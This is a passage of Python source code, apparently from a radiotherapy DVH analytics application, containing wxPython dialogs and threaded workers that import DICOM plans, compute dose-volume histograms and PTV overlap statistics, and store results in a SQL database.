def on_edit_sim_study_date(self, evt):
self.on_edit_date("sim_study_date")
def on_edit_date(self, key):
DatePicker(
initial_date=self.input[key].GetValue(),
title=key.replace("_", " ").title(),
action=self.input[key].SetValue,
)
self.validate(uid=self.selected_uid)
self.update_warning_label()
def on_roi_manager(self, evt):
RoiManager(
self,
self.roi_map,
self.input["physician"].GetValue(),
self.input_roi["physician"].GetValue(),
)
self.update_physician_choices(keep_old_physician=True)
self.update_physician_roi_choices()
self.update_roi_inputs()
self.dicom_importer.update_mapped_roi_status(
self.input["physician"].GetValue()
)
self.update_input_roi_physician_enable()
def on_add_physician(self, evt):
AddPhysician(
self.roi_map, initial_physician=self.input["physician"].GetValue()
)
self.update_physician_choices()
def on_manage_physician_roi(self, evt):
physician = self.input["physician"].GetValue()
unlinked_institutional_rois = (
self.roi_map.get_unused_institutional_rois(physician)
)
AddPhysicianROI(self, physician, unlinked_institutional_rois)
def on_manage_roi_type(self, evt):
AddROIType(self)
def update_physician_choices(self, keep_old_physician=False):
old_physician = self.input["physician"].GetValue()
old_physicians = self.input["physician"].Items
new_physicians = self.roi_map.get_physicians()
new_physician = [
p for p in new_physicians if p and p not in old_physicians
]
self.input["physician"].Clear()
self.input["physician"].Append(new_physicians)
if not keep_old_physician and new_physician:
self.input["physician"].SetValue(new_physician[0])
else:
self.input["physician"].SetValue(old_physician)
def on_physician_roi_change(self, evt):
physician = self.input["physician"].GetValue()
variation = self.selected_roi
physician_roi = self.input_roi["physician"].GetValue()
if physician_roi not in self.roi_map.get_physician_rois(physician):
self.roi_map.add_physician_roi(physician, physician_roi)
if variation not in self.roi_map.get_variations(
physician, physician_roi
):
self.roi_map.add_variations(physician, physician_roi, variation)
self.dicom_importer.update_mapped_roi_status(physician)
self.update_input_roi_physician_enable()
def patient_orientation_warning(self):
dsets = self.parsed_dicom_data
non_hfs = {
ds.mrn: ds.patient_orientation
for ds in dsets.values()
if ds.patient_orientation != "HFS"
}
if non_hfs:
caption = "Non-HFS Orientations Detected"
msg = (
"WARNGING: Due to a bug in dicompyler-core <=0.5.5, DVHs may be incorrect for non-HFS orientations."
" Please verify the following patients (MRNs):\n%s"
% ", ".join(sorted(list(non_hfs)))
)
ErrorDialog(self, msg, caption)
def on_save_roi_type_in_map(self, *evt):
physician = self.input["physician"].GetValue()
physician_roi = self.input_roi["physician"].GetValue()
roi_type = self.input_roi["type"].GetValue()
self.roi_map.set_roi_type(physician, physician_roi, roi_type)
class ImportStatusDialog(wx.Dialog):
"""
Dialog with progress information about DICOM import
"""
def __init__(self):
wx.Dialog.__init__(self, None)
self.gauge_study = wx.Gauge(self, wx.ID_ANY, 100)
self.gauge_calculation = wx.Gauge(self, wx.ID_ANY, 100)
self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")
# self.error_details_pane = wx.CollapsiblePane(self, label='Details')
# self.error_details_window = wx.ScrolledWindow(self.error_details_pane.GetPane())
# self.error_details_text = wx.StaticText(self.error_details_window, wx.ID_ANY,
# "Error details go here.\n"
# "Will add things soon.")
self.__set_properties()
self.__do_layout()
self.__do_subscribe()
self.Bind(
wx.EVT_BUTTON, self.set_terminate, id=self.button_cancel.GetId()
)
self.Bind(wx.EVT_CLOSE, self.set_terminate)
self.start_time = datetime.now()
def __do_subscribe(self):
pub.subscribe(self.update_patient, "update_patient")
pub.subscribe(self.update_calculation, "update_calculation")
pub.subscribe(self.update_dvh_progress, "update_dvh_progress")
pub.subscribe(self.update_elapsed_time, "update_elapsed_time")
pub.subscribe(self.close, "close")
@staticmethod
def do_unsubscribe():
for topic in [
"update_patient",
"update_calculation",
"update_elapsed_time",
"close",
]:
pub.unsubAll(topicName=topic)
def __set_properties(self):
self.SetTitle("Import Progress")
self.SetSize((700, 260))
def __do_layout(self):
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_progress = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_calculation = wx.BoxSizer(wx.VERTICAL)
sizer_study = wx.BoxSizer(wx.VERTICAL)
sizer_time_cancel = wx.BoxSizer(wx.HORIZONTAL)
# sizer_error_pane = wx.BoxSizer(wx.HORIZONTAL)
# sizer_error_window = wx.BoxSizer(wx.HORIZONTAL)
# sizer_error_text = wx.BoxSizer(wx.HORIZONTAL)
self.label_study_counter = wx.StaticText(
self, wx.ID_ANY, " " * 12, style=wx.ALIGN_CENTER
)
sizer_study.Add(self.label_study_counter, 0, wx.ALIGN_CENTER, 0)
self.label_patient = wx.StaticText(self, wx.ID_ANY, "Patient:")
sizer_study.Add(self.label_patient, 0, 0, 0)
self.label_study = wx.StaticText(
self, wx.ID_ANY, "Plan SOP Instance UID:"
)
sizer_study.Add(self.label_study, 0, 0, 0)
sizer_study.Add(self.gauge_study, 0, wx.EXPAND, 0)
sizer_progress.Add(sizer_study, 0, wx.ALL | wx.EXPAND, 5)
self.label_calculation = wx.StaticText(
self, wx.ID_ANY, "Calculation: DVH"
)
sizer_calculation.Add(self.label_calculation, 0, 0, 0)
self.label_structure = wx.StaticText(self, wx.ID_ANY, "")
sizer_calculation.Add(self.label_structure, 0, 0, 0)
sizer_calculation.Add(self.gauge_calculation, 0, wx.EXPAND, 0)
sizer_progress.Add(sizer_calculation, 0, wx.ALL | wx.EXPAND, 5)
sizer_wrapper.Add(sizer_progress, 0, wx.EXPAND | wx.ALL, 5)
self.label_elapsed_time = wx.StaticText(
self, wx.ID_ANY, "Elapsed time:"
)
sizer_time_cancel.Add(
self.label_elapsed_time, 1, wx.EXPAND | wx.ALL, 5
)
sizer_time_cancel.Add(self.button_cancel, 0, wx.ALL, 5)
sizer_wrapper.Add(sizer_time_cancel, 1, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.Layout()
self.Center()
def close(self):
self.do_unsubscribe()
self.Destroy()
def update_patient(self, msg):
"""
Update patient/study related information. Linked with pubsub to ImportWorker
:param msg: study_number, study_total, patient_name, uid, and progress values
:type msg: dict
"""
wx.CallAfter(
self.label_study_counter.SetLabelText,
"Plan %s of %s" % (msg["study_number"], msg["study_total"]),
)
wx.CallAfter(
self.label_patient.SetLabelText,
"Patient: %s" % msg["patient_name"],
)
wx.CallAfter(
self.label_study.SetLabelText,
"Plan SOP Instance UID: %s" % msg["uid"],
)
wx.CallAfter(self.gauge_study.SetValue, msg["progress"])
self.update_elapsed_time()
def update_calculation(self, msg):
"""
Update calculation related information. Linked with pubsub to ImportWorker
:param msg: calculation type, roi_num, roi_total, roi_name, and progress values
:type msg: dict
"""
wx.CallAfter(
self.button_cancel.Enable,
"Dose Grid Summation" not in msg["calculation"],
)
wx.CallAfter(
self.label_calculation.SetLabelText,
"Calculation: %s" % msg["calculation"],
)
wx.CallAfter(self.gauge_calculation.SetValue, msg["progress"])
if msg["roi_name"]:
label_text = "Structure (%s of %s): %s" % (
msg["roi_num"],
msg["roi_total"],
msg["roi_name"],
)
else:
label_text = ""
wx.CallAfter(self.label_structure.SetLabelText, label_text)
self.update_elapsed_time()
def update_dvh_progress(self, msg):
label = self.label_structure.GetLabelText()
if "[" in label and label.endswith("%]"):
label = label[: label.rfind("[")].strip()
label = "%s [%0.0f%%]" % (label, msg * 100)
wx.CallAfter(self.label_structure.SetLabelText, label)
self.update_elapsed_time()
def update_elapsed_time(self):
"""
Update the elapsed time. Linked with pubsub to ImportWorker
"""
elapsed_time = get_elapsed_time(self.start_time, datetime.now())
wx.CallAfter(
self.label_elapsed_time.SetLabelText,
"Elapsed Time: %s" % elapsed_time,
)
def set_terminate(self, *evt):
caption = "Terminate import?"
MessageDialog(self, caption, action_yes_func=self.send_terminate)
def send_terminate(self):
pub.sendMessage("terminate_import")
self.close()
class StudyImporter:
def __init__(
self, init_params, msg, import_uncategorized, final_plan_in_study
):
"""
Intended to import a study on init, no use afterwards as no properties available
:param init_params: initial parameters to create DICOM_Parser object
:type init_params: dict
:param msg: initial pub message for update patient, includes plan counting and progress
:type msg: dict
:param import_uncategorized: import ROIs even if not in ROI map, if set to True
:type import_uncategorized: bool
:param final_plan_in_study: prompts composite PTV calculations if True
:type final_plan_in_study: bool
"""
# Store SQL time for deleting a partially imported plan
with DVH_SQL() as cnx:
self.last_import_time = cnx.now
self.init_params = init_params
self.msg = msg
self.import_uncategorized = import_uncategorized
self.final_plan_in_study = final_plan_in_study
self.terminate = False
pub.subscribe(self.set_terminate, "terminate_import")
try:
self.run()
except Exception as e:
msg = "ERROR: Failed Import for %s %s" % \
(self.msg["patient_name"], self.msg["uid"])
push_to_log(e, msg=msg)
self.delete_partially_updated_plan()
def run(self):
wx.CallAfter(pub.sendMessage, "update_patient", msg=self.msg)
wx.CallAfter(pub.sendMessage, "update_elapsed_time")
msg = {
"calculation": "DICOM Parsing",
"roi_num": 1,
"roi_total": 1,
"roi_name": "",
"progress": 0,
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
parsed_data = DICOM_Parser(**self.init_params)
wx.CallAfter(pub.sendMessage, "update_elapsed_time")
# Storing this now, parsed_data sometimes gets cleared prior storing actual values in this message when
# generating this immediately before pub.sendMessage
move_msg = {
"files": [
parsed_data.plan_file,
parsed_data.structure_file,
parsed_data.dose_file,
],
"mrn": parsed_data.mrn,
"uid": parsed_data.study_instance_uid_to_be_imported,
"import_path": parsed_data.import_path,
}
mrn = parsed_data.mrn
study_uid = parsed_data.study_instance_uid_to_be_imported
structures = parsed_data.structure_name_and_type
roi_name_map = {
key: structures[key]["name"]
for key in list(structures)
if structures[key]["type"] != "MARKER"
}
data_to_import = {
"Plans": [parsed_data.get_plan_row()],
"Rxs": parsed_data.get_rx_rows(),
"Beams": parsed_data.get_beam_rows(),
"DICOM_Files": [parsed_data.get_dicom_file_row()],
"DVHs": [],
} # DVHs will only include PTVs, others pushed en route
# remove uncategorized ROIs unless this is checked
if not self.import_uncategorized:
for roi_key in list(roi_name_map):
try:
name = parsed_data.get_physician_roi(roi_key)
if name == "uncategorized":
roi_name_map.pop(roi_key)
except Exception as e:
msg = "Failed to remove %s from import list" % \
roi_name_map[roi_key]
push_to_log(e, msg=msg)
# Remove previously imported roi's (e.g., when dose summations occur)
with DVH_SQL() as cnx:
for roi_key in list(roi_name_map):
if cnx.is_roi_imported(
clean_name(roi_name_map[roi_key]), study_uid
):
roi_name_map.pop(roi_key)
roi_total = len(roi_name_map)
ptvs = {key: [] for key in ["dvh", "volume", "index"]}
for roi_counter, roi_key in enumerate(list(roi_name_map)):
if self.terminate:
continue
else:
# Send messages to status dialog about progress
msg = {
"calculation": "DVH",
"roi_num": roi_counter + 1,
"roi_total": roi_total,
"roi_name": roi_name_map[roi_key],
"progress": int(100 * (roi_counter + 1) / roi_total),
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
wx.CallAfter(pub.sendMessage, "update_elapsed_time")
try:
dvh_row = parsed_data.get_dvh_row(roi_key)
except MemoryError as e:
msg = (
"StudyImporter.run: Memory Error - "
"Skipping roi: %s, for mrn: %s"
% (roi_name_map[roi_key], mrn)
)
push_to_log(e, msg=msg)
dvh_row = None
if dvh_row:
roi_type = dvh_row["roi_type"][0]
# Collect dvh, volume, and index of ptvs to be used for post-import calculations
if roi_type.startswith("PTV"):
ptvs["dvh"].append(dvh_row["dvh_string"][0])
ptvs["volume"].append(dvh_row["volume"][0])
ptvs["index"].append(len(data_to_import["DVHs"]))
data_to_import["DVHs"].append(dvh_row)
else:
self.push({"DVHs": [dvh_row]})
# Sort PTVs by their D_95% (applicable to SIBs)
if ptvs["dvh"] and not self.terminate:
ptv_order = rank_ptvs_by_D95(ptvs)
for ptv_row, dvh_row_index in enumerate(ptvs["index"]):
data_to_import["DVHs"][dvh_row_index]["roi_type"][
0
] = "PTV%s" % (ptv_order[ptv_row] + 1)
# Must push data to SQL before processing post import calculations since they rely on SQL
if not self.terminate:
self.push(data_to_import)
# Wait until entire study has been pushed since these values are based on entire PTV volume,
# unless plan_ptvs are assigned
if (
self.final_plan_in_study or parsed_data.plan_ptvs
) and not self.terminate:
if db_update.uid_has_ptvs(study_uid):
# collect roi names for post-import calculations
# This block moved here since patient's with multiple plans use multiple threads, calculate this
# on import of final plan import
post_import_rois = []
roi_name_map = {
key: structures[key]["name"]
for key in list(structures)
if structures[key]["type"] != "MARKER"
}
for roi_counter, roi_key in enumerate(list(roi_name_map)):
roi_name = clean_name(roi_name_map[roi_key])
with DVH_SQL() as cnx:
condition = (
"roi_name = '%s' and study_instance_uid = '%s'"
% (roi_name, study_uid)
)
query_return = cnx.query(
"DVHs", "roi_type, physician_roi", condition
)
if query_return:
roi_type, physician_roi = tuple(query_return[0])
included_types = ["organ", "ctv", "gtv", "none", ""]
if str(roi_type).lower() in included_types:
if not (
str(physician_roi).lower()
in [
"uncategorized",
"ignored",
"external",
"skin",
"body",
]
or roi_name.lower()
in ["external", "skin", "body"]
):
post_import_rois.append(
clean_name(roi_name_map[roi_key])
)
# Calculate the PTV overlap for each roi
tv = db_update.get_total_treatment_volume_of_study(
study_uid, ptvs=parsed_data.plan_ptvs
)
self.post_import_calc(
"PTV Overlap Volume",
study_uid,
post_import_rois,
db_update.treatment_volume_overlap,
tv,
)
# Calculate the centroid distances of roi-to-PTV for each roi
tv_centroid = db_update.get_treatment_volume_centroid(tv)
self.post_import_calc(
"Centroid Distance to PTV",
study_uid,
post_import_rois,
db_update.dist_to_ptv_centroids,
tv_centroid,
)
# Calculate minimum, mean, median, and max distances and DTH
# tv_coord = db_update.get_treatment_volume_coord(tv)
# tv_coord = sample_roi(tv_coord)
self.post_import_calc(
"Distances to PTV",
study_uid,
post_import_rois,
db_update.min_distances,
tv,
)
# Calculate OVH
self.post_import_calc(
"Overlap Volume Histogram (OVH)",
study_uid,
post_import_rois,
db_update.ovh,
tv,
)
self.update_ptv_data_in_db(tv, study_uid)
else:
msg = (
"StudyImporter.run: Skipping PTV related calculations. "
"No PTV found for mrn: %s" % mrn
)
push_to_log(msg=msg)
if self.terminate:
self.delete_partially_updated_plan()
else:
pub.sendMessage("dicom_import_move_files_queue", msg=move_msg)
if self.final_plan_in_study:
pub.sendMessage("dicom_import_move_files")
@staticmethod
def push(data_to_import):
"""
Push data to the SQL database
:param data_to_import: data to import, should be formatted as
indicated in db.sql_connector.DVH_SQL.insert_row
:type data_to_import: dict
"""
with DVH_SQL() as cnx:
cnx.insert_data_set(data_to_import)
def post_import_calc(self, title, uid, rois, func, pre_calc):
"""
Generic function to perform a post-import calculation
:param title: title to be displayed in progress dialog
:type title: str
:param uid: the plan uid to be displayed in the progress dialog
:type uid: str
:param rois: the roi_names to be processed
:type rois: list
:param func: the function from db.update called to process the data
:param pre_calc: data related to total treatment volume for the specific func passed
"""
if not self.terminate:
roi_total = len(rois)
for roi_counter, roi_name in enumerate(rois):
msg = {
"calculation": title,
"roi_num": roi_counter + 1,
"roi_total": roi_total,
"roi_name": roi_name,
"progress": int(100 * roi_counter / roi_total),
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
func(uid, roi_name, pre_calc=pre_calc)
def update_ptv_data_in_db(self, tv, study_uid):
if not self.terminate:
# Update progress dialog
msg = {
"calculation": "Total Treatment Volume Statistics",
"roi_num": 0,
"roi_total": 1,
"roi_name": "PTV",
"progress": 0,
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
# Update PTV geometric data
db_update.update_ptv_data(tv, study_uid)
# Update progress dialog
msg["roi_num"], msg["progress"] = 1, 100
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
def delete_partially_updated_plan(self):
"""
If import process fails, call this function to remove the partially imported data into SQL
"""
with DVH_SQL() as cnx:
if cnx.db_type == "sqlite":
cnx.delete_rows(
"DATETIME(import_time_stamp) > DATETIME('%s')"
% self.last_import_time
)
else:
cnx.delete_rows(
"import_time_stamp > '%s'::date" % self.last_import_time
)
def set_terminate(self):
self.terminate = True
class ImportWorker(Thread):
"""
Create a thread separate from the GUI to perform the import calculations
"""
def __init__(
self,
data,
checked_uids,
import_uncategorized,
other_dicom_files,
start_path,
keep_in_inbox,
roi_map,
use_dicom_dvh,
auto_sum_dose,
copy_misc_files,
):
"""
:param data: parsed dicom data
:type data: dict
:param checked_uids: uids that were selected in the GUI for import
:type checked_uids: list
:param import_uncategorized: if True, import rois with names that that are not mapped
:type import_uncategorized: bool
:param other_dicom_files: other dicom files found in the import directory
:type other_dicom_files: dict
:param keep_in_inbox: Set to False to move files, True to copy files to imported
:type keep_in_inbox: bool
:param roi_map: pass the latest roi_map
:param use_dicom_dvh: if DVH exists in DICOM RT-Dose, import it instead of calculating
:type use_dicom_dvh: bool
:param auto_sum_dose:
:type auto_sum_dose: bool
:param copy_misc_files:
:type copy_misc_files: bool
"""
Thread.__init__(self)
self.delete_dose_sum_files() # do this before starting the thread to avoid crash
self.data = data
self.checked_uids = checked_uids
self.import_uncategorized = import_uncategorized
self.other_dicom_files = other_dicom_files
self.start_path = start_path
self.keep_in_inbox = keep_in_inbox
self.roi_map = roi_map
self.use_dicom_dvh = use_dicom_dvh
self.auto_sum_dose = auto_sum_dose
self.copy_misc_files = copy_misc_files
self.dose_sum_save_file_names = self.get_dose_sum_save_file_names()
self.move_msg_queue = []
self.terminate = False
self.__do_subscribe()
self.start() # start the thread
def __do_subscribe(self):
pub.subscribe(self.move_files, "dicom_import_move_files")
pub.subscribe(
self.track_move_files_msg, "dicom_import_move_files_queue"
)
pub.subscribe(self.set_terminate, "terminate_import")
def run(self):
try:
if self.auto_sum_dose:
msg = {
"calculation": "Dose Grid Summation(s)... please wait",
"roi_num": 0,
"roi_total": 1,
"roi_name": "",
"progress": 0,
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
self.run_dose_sum()
except Exception as e:
msg = "ERROR: Dose summation failed"
push_to_log(e, msg=msg)
try:
self.run_import()
if not self.terminate:
wx.CallAfter(pub.sendMessage, "backup_sqlite_db")
except Exception as e:
msg = "ERROR: Import failed"
push_to_log(e, msg=msg)
self.close()
def close(self):
self.delete_dose_sum_files()
remove_empty_sub_folders(self.start_path)
pub.sendMessage("close")
def run_dose_sum(self):
"""Could not implement with threading due to memory allocation issues"""
pool = Pool(processes=1)
pool.starmap(self.sum_two_doses, self.dose_sum_args)
pool.close()
def run_import(self):
queue = self.import_queue
worker = Thread(target=self.import_target, args=[queue])
worker.setDaemon(True)
worker.start()
queue.join()
def import_target(self, queue):
while queue.qsize():
parameters = queue.get()
if not self.terminate:
StudyImporter(*parameters)
queue.task_done()
def get_dose_file_sets(self):
study_uids = get_study_uid_dict(self.checked_uids, self.data)
dose_file_sets = {}
for study_uid, plan_uid_set in study_uids.items():
if len(plan_uid_set) > 1:
dose_file_sets[study_uid] = [
self.data[plan_uid].dose_file for plan_uid in plan_uid_set
]
return dose_file_sets
@property
def import_queue(self):
study_uids = get_study_uid_dict(self.checked_uids, self.data)
plan_total = len(self.checked_uids)
plan_counter = 0
queue = Queue()
for study_uid, plan_uid_set in study_uids.items():
plan_count = len(plan_uid_set)
for i, plan_uid in enumerate(plan_uid_set):
if plan_uid in list(self.data):
msg = {
"patient_name": self.data[plan_uid].patient_name,
"uid": self.data[
plan_uid
].study_instance_uid_to_be_imported,
"progress": int(100 * plan_counter / plan_total),
"study_number": plan_counter + 1,
"study_total": plan_total,
}
init_param = self.data[plan_uid].init_param
init_param["roi_map"] = self.roi_map
init_param["use_dicom_dvh"] = self.use_dicom_dvh
if self.auto_sum_dose:
if study_uid in self.dose_sum_save_file_names.keys():
init_param[
"dose_sum_file"
] = self.dose_sum_save_file_names[study_uid]
elif plan_count > 1:
init_param["plan_over_rides"][
"study_instance_uid"
] = "%s_%s" % (study_uid, i + 1)
final_plan = (
True
if not self.auto_sum_dose
else plan_uid == plan_uid_set[-1]
)
args = (
init_param,
msg,
self.import_uncategorized,
final_plan,
)
queue.put(args)
else:
msg = (
"ImportWorker.import_queue: This plan could not be parsed. Skipping import. "
"Did you supply RT Structure, Dose, and Plan?\n\tPlan UID: %s\n\tMRN: %s"
% (plan_uid, self.data[plan_uid].mrn)
)
push_to_log(msg=msg)
plan_counter += 1
return queue
def move_files(self):
for msg in self.move_msg_queue:
files = msg["files"]
if (
self.copy_misc_files
and msg["uid"] in self.other_dicom_files.keys()
):
files.extend(self.other_dicom_files[msg["uid"]])
new_dir = join(msg["import_path"], msg["mrn"])
move_files_to_new_path(
files,
new_dir,
copy_files=self.keep_in_inbox,
callback=self.update_copy_status,
)
self.move_msg_queue = [] # clear queue
@staticmethod
def update_copy_status(i, file_count):
status = "Copying file %s of %s" % (i + 1, file_count)
progress = (float(i) / file_count) * 100
msg = {
"calculation": status,
"roi_num": i,
"roi_total": file_count,
"roi_name": "",
"progress": progress,
}
wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
def track_move_files_msg(self, msg):
self.move_msg_queue.append(msg)
def set_terminate(self):
self.terminate = True
@property
def dose_sum_args(self):
pool_args = []
file_names = self.dose_sum_save_file_names
for uid, dose_file_set in self.get_dose_file_sets().items():
if len(dose_file_set) > 1:
args = (dose_file_set[0], dose_file_set[1], file_names[uid])
pool_args.append(args)
if len(dose_file_set) > 2:
for dose_file in dose_file_set[2:]:
args = (file_names[uid], dose_file, file_names[uid])
pool_args.append(args)
return pool_args
def get_dose_sum_save_file_names(self):
dose_file_sets = self.get_dose_file_sets()
current_temp_files = [
f for f in listdir(TEMP_DIR) if "temp_dose_sum" in f
]
file_save_names = []
counter = 1
while len(file_save_names) < len(list(dose_file_sets)):
file_save_name = "temp_dose_sum_%s" % counter
counter += 1
if file_save_name not in current_temp_files:
file_save_names.append(file_save_name)
file_save_names_dict = {
uid: join(TEMP_DIR, file_save_names[i])
for i, uid in enumerate(list(dose_file_sets))
}
return file_save_names_dict
@staticmethod
def sum_two_doses(dose_file_1, dose_file_2, save_to):
grid_1 = DoseGrid(dose_file_1)
grid_2 = DoseGrid(dose_file_2)
grid_1.add(grid_2)
grid_1.save_dcm(join(TEMP_DIR, save_to))
@staticmethod
def delete_dose_sum_files():
for f in listdir(TEMP_DIR):
if "temp_dose_sum" in f:
remove(join(TEMP_DIR, f))
def get_study_uid_dict(checked_uids, parsed_dicom_data, multi_plan_only=False):
"""
This thread iterates through self.checked_uids which contains plan uids, but we need to iterate through
study instance uids so that plans on the same study are imported adjacently.
:return: a dictionary with study uids for the keys and a list of associated plan uids for values
:rtype: dict
"""
study_uids = {}
for plan_uid in checked_uids:
study_uid = parsed_dicom_data[
plan_uid
].study_instance_uid_to_be_imported
if study_uid not in list(study_uids):
study_uids[study_uid] = []
study_uids[study_uid].append(plan_uid)
if multi_plan_only:
for study_uid in list(study_uids):
if len(study_uids[study_uid]) < 2:
study_uids.pop(study_uid)
return study_uids
class AssignPTV(wx.Dialog):
def __init__(self, parent, parsed_dicom_data, study_uid_dict):
wx.Dialog.__init__(self, parent)
self.continue_status = False
self.parsed_dicom_data = parsed_dicom_data
self.study_uid_dict = study_uid_dict
self.__initialize_uid_dict()
self.__initialize_ptv_dict()
self.__initialize_patient_name_list()
self.current_index = 0
self.__set_auto_assigned()
self.plan_uid, self.study_uid = self.uids[self.current_index]
self.input_keys = [
"patient_name",
"study_instance_uid",
"plan_uid",
"sim_study_date",
"tx_site",
]
self.text_ctrl = {
key: wx.TextCtrl(self, wx.ID_ANY, "") for key in self.input_keys
}
self.label = {
key: wx.StaticText(
self,
wx.ID_ANY,
key.replace("_", " ").title().replace("Uid", "UID") + ":",
)
for key in self.input_keys
}
self.button_add = wx.Button(self, wx.ID_ANY, ">")
self.button_remove = wx.Button(self, wx.ID_ANY, "<")
keys = ["ignored", "included"]
self.list_ctrl = {
key: wx.ListCtrl(
self,
wx.ID_ANY,
style=wx.LC_HRULES | wx.LC_REPORT | wx.LC_VRULES,
)
for key in keys
}
self.data_table = {
key: DataTable(
self.list_ctrl[key], columns=[key.capitalize()], widths=[-2]
)
for key in keys
}
self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")
self.button_back = wx.Button(self, wx.ID_ANY, "Back")
self.button_next = wx.Button(self, wx.ID_ANY, "Next")
self.gauge = wx.Gauge(self, wx.ID_ANY, 100)
self.__set_properties()
self.__do_bind()
self.__do_layout()
if not len(self.allowed_indices):
wx.CallAfter(self.close)
else:
self.update_data()
def __set_properties(self):
self.SetTitle("PTV Assignment for Overlap and Distance Calculations")
for text_ctrl in self.text_ctrl.values():
text_ctrl.Disable()
def __do_bind(self):
self.Bind(wx.EVT_BUTTON, self.on_next, id=self.button_next.GetId())
self.Bind(wx.EVT_BUTTON, self.on_back, id=self.button_back.GetId())
self.Bind(wx.EVT_BUTTON, self.on_include, id=self.button_add.GetId())
self.Bind(wx.EVT_BUTTON, self.on_ignore, id=self.button_remove.GetId())
def __do_layout(self):
# Sizers
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_main = wx.BoxSizer(wx.VERTICAL)
sizer_input = wx.StaticBoxSizer(
wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
)
sizer_text_ctrl = {
key: wx.BoxSizer(wx.VERTICAL) for key in self.input_keys
}
sizer_add_remove = wx.BoxSizer(wx.VERTICAL)
sizer_list_ctrl = wx.BoxSizer(wx.HORIZONTAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
sizer_cancel = wx.BoxSizer(wx.HORIZONTAL)
sizer_back_next = wx.BoxSizer(wx.HORIZONTAL)
sizer_gauge = wx.BoxSizer(wx.HORIZONTAL)
# Add text_ctrl and label objects
for key in self.input_keys:
sizer_text_ctrl[key].Add(self.label[key], 0, 0, 0)
sizer_text_ctrl[key].Add(self.text_ctrl[key], 0, wx.EXPAND, 0)
sizer_input.Add(sizer_text_ctrl[key], 0, wx.ALL | wx.EXPAND, 5)
# PTV assignment objections
sizer_list_ctrl.Add(self.list_ctrl["ignored"], 1, wx.EXPAND, 0)
sizer_add_remove.Add((20, 20), 0, 0, 0) # Top Spacer
sizer_add_remove.Add(self.button_add, 0, wx.ALIGN_CENTER | wx.ALL, 5)
sizer_add_remove.Add(
self.button_remove, 0, wx.ALIGN_CENTER | wx.ALL, 5
)
sizer_add_remove.Add((20, 20), 0, 0, 0) # Bottom Spacer
sizer_list_ctrl.Add(sizer_add_remove, 0, wx.ALL | wx.EXPAND, 10)
sizer_list_ctrl.Add(self.list_ctrl["included"], 1, wx.EXPAND, 0)
sizer_input.Add(sizer_list_ctrl, 0, wx.ALL | wx.EXPAND, 5)
# Cancel, Back, and Next buttons
sizer_cancel.Add(self.button_cancel, 0, wx.ALL, 5)
sizer_buttons.Add(sizer_cancel, 0, wx.EXPAND, 0)
sizer_gauge.Add(self.gauge, 1, wx.EXPAND | wx.ALL, 5)
sizer_buttons.Add(sizer_gauge, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 50)
sizer_back_next.Add(self.button_back, 0, wx.ALL, 5)
sizer_back_next.Add(self.button_next, 0, wx.ALL, 5)
sizer_buttons.Add(sizer_back_next, 0, wx.EXPAND, 0)
sizer_main.Add(sizer_input, 1, wx.ALL | wx.EXPAND, 5)
sizer_main.Add(sizer_buttons, 0, wx.ALL | wx.EXPAND, 5)
note = wx.StaticText(
self,
wx.ID_ANY,
"NOTE: Only StudyInstanceUIDs associated with multiple dose files "
"are included/needed in this PTV Assignment window.",
)
note.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
sizer_main.Add(note, 0, wx.ALL, 10)
sizer_wrapper.Add(sizer_main, 1, wx.EXPAND, 0)
self.SetSizer(sizer_wrapper)
self.Fit()
self.Layout()
self.Center()
def __initialize_uid_dict(self):
"""Create a list of tuples (plan_uid, study_uid) for multi-plan studies"""
self.uids = []
self.study_uid_list = []
self.plan_uid_lists = {}
for study_uid, plan_uid_set in self.study_uid_dict.items():
if len(plan_uid_set) > 1:
if study_uid not in self.study_uid_list:
self.study_uid_list.append(study_uid)
self.plan_uid_lists[study_uid] = []
for plan_uid in plan_uid_set:
self.plan_uid_lists[study_uid].append(plan_uid)
self.uids.append((plan_uid, study_uid))
def __initialize_ptv_dict(self):
"""Create dict to track all PTVs in a study, and to which plans they are assigned"""
self.ptvs = {}
for plan_uid, study_uid in self.uids:
if study_uid not in list(self.ptvs):
self.ptvs[study_uid] = set()
if plan_uid not in list(self.ptvs):
self.ptvs[plan_uid] = set(
self.parsed_dicom_data[plan_uid].plan_ptvs
)
ptvs = set(
self.parsed_dicom_data[plan_uid].stored_values["ptv_names"]
)
self.ptvs[study_uid] = self.ptvs[study_uid].union(ptvs)
def __initialize_patient_name_list(self):
self.patient_name_list = []
for study_uid in self.study_uid_list:
for plan_uid in self.plan_uid_lists[study_uid]:
patient_name = self.parsed_dicom_data[plan_uid].patient_name
if patient_name not in self.patient_name_list:
self.patient_name_list.append(patient_name)
def update_labels(self):
study_index = self.study_uid_list.index(self.study_uid)
study_length = len(self.study_uid_list)
plan_uid_index = self.plan_uid_lists[self.study_uid].index(
self.plan_uid
)
plan_length = len(self.plan_uid_lists[self.study_uid])
pat_index = self.patient_name_list.index(
self.text_ctrl["patient_name"].GetValue()
)
pat_length = len(self.patient_name_list)
study_label_end = ": (%s/%s)" % (study_index + 1, study_length)
new_study_label = (
self.label["study_instance_uid"].GetLabel().split(":")[0]
+ study_label_end
)
self.label["study_instance_uid"].SetLabel(new_study_label)
plan_label_end = ": (%s/%s)" % (plan_uid_index + 1, plan_length)
new_plan_label = (
self.label["plan_uid"].GetLabel().split(":")[0] + plan_label_end
)
self.label["plan_uid"].SetLabel(new_plan_label)
pat_label_end = ": (%s/%s)" % (pat_index + 1, pat_length)
right_colon_index = self.label["patient_name"].GetLabel().rfind(":")
new_pat_label = (
